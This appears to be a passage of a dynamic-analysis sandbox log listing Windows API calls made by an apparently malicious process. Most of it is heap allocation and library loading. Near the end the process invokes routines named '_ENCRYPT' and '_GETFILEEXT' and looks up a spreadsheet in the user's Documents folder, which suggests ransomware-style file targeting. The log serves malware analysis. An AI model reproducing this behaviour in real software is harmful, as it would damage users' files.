0x9bdae0 [0171.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0171.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0171.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0171.269] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x9c5180, cbMultiByte=57, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0171.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x72) returned 0x8afe68 [0171.269] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x9c5180, cbMultiByte=57, lpWideCharStr=0x8afe68, cchWideChar=57 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\kQVkybnJLUTO.ods") returned 57 [0171.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0171.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0b78 [0171.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8afe68 | out: hHeap=0x8a0000) returned 1 [0171.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c5180 | out: hHeap=0x8a0000) returned 1 [0171.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0171.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0171.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0171.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0171.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0171.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0171.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0171.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0171.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0171.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0171.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0171.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0171.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0171.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0171.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0171.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0171.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0171.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0171.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0171.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0171.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0171.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0171.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0171.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0171.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0171.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0171.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0171.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0171.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0171.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0171.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0171.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0171.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0171.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0171.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0171.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0171.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0171.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0171.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0171.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0171.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0171.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0171.271] FreeLibrary (hLibModule=0x75990000) returned 1 [0171.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0171.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0171.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0171.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0171.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0171.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0171.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0171.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0171.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0171.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0171.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0171.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0171.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0171.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0171.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0171.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0171.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0171.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0171.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0171.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0171.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0171.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0171.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0171.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0171.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0171.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0171.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0171.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0171.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0171.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0171.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0171.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0171.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0171.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0171.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0171.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0171.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0171.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0171.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c00 | out: hHeap=0x8a0000) returned 1 [0171.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0171.272] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0171.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0171.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0171.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0171.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0171.273] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0171.273] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0171.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0171.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0171.273] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0171.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0171.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0171.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0171.273] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0171.273] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0171.273] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0171.273] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0171.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0171.273] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0171.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0171.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0171.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0171.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0171.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0171.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0171.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0171.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0171.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0171.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0171.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0171.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0171.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0171.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0171.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0171.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0171.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0171.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0171.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0171.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0171.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0171.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0171.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0171.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0171.275] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0171.275] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0171.275] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0171.275] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0171.275] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0171.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0171.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0171.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0171.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0171.275] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0171.275] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0171.275] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0171.275] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0171.275] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0171.275] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0171.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0171.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0171.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0171.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0171.276] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0171.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0171.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0171.276] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0171.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd378 [0171.276] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd378, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0171.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0171.276] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0171.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0171.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0171.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0171.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0171.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0171.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0171.276] CloseHandle (hObject=0x138) returned 1 [0171.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0171.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0171.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0171.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0171.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0171.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0171.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0171.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0171.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0171.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0171.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0171.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0171.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0171.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0171.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0171.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0171.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0171.278] FreeLibrary (hLibModule=0x75990000) returned 1 [0171.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0171.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0171.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0171.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0171.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0171.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0171.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0171.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0171.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0171.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0171.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0171.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0171.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0171.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0171.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0171.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0171.278] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0171.278] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0171.278] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0171.279] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0171.279] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0171.279] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0171.279] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0171.279] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0171.279] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0171.279] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0171.279] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0171.279] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0171.279] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0171.279] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0171.279] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0171.279] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ds", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0171.279] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ods", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0171.279] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ods", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0171.279] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0171.279] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0171.279] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0171.280] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\kQVkybnJLUTO.ods", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2c841e50, ftCreationTime.dwHighDateTime=0x1d5e04c, ftLastAccessTime.dwLowDateTime=0xe06b1270, 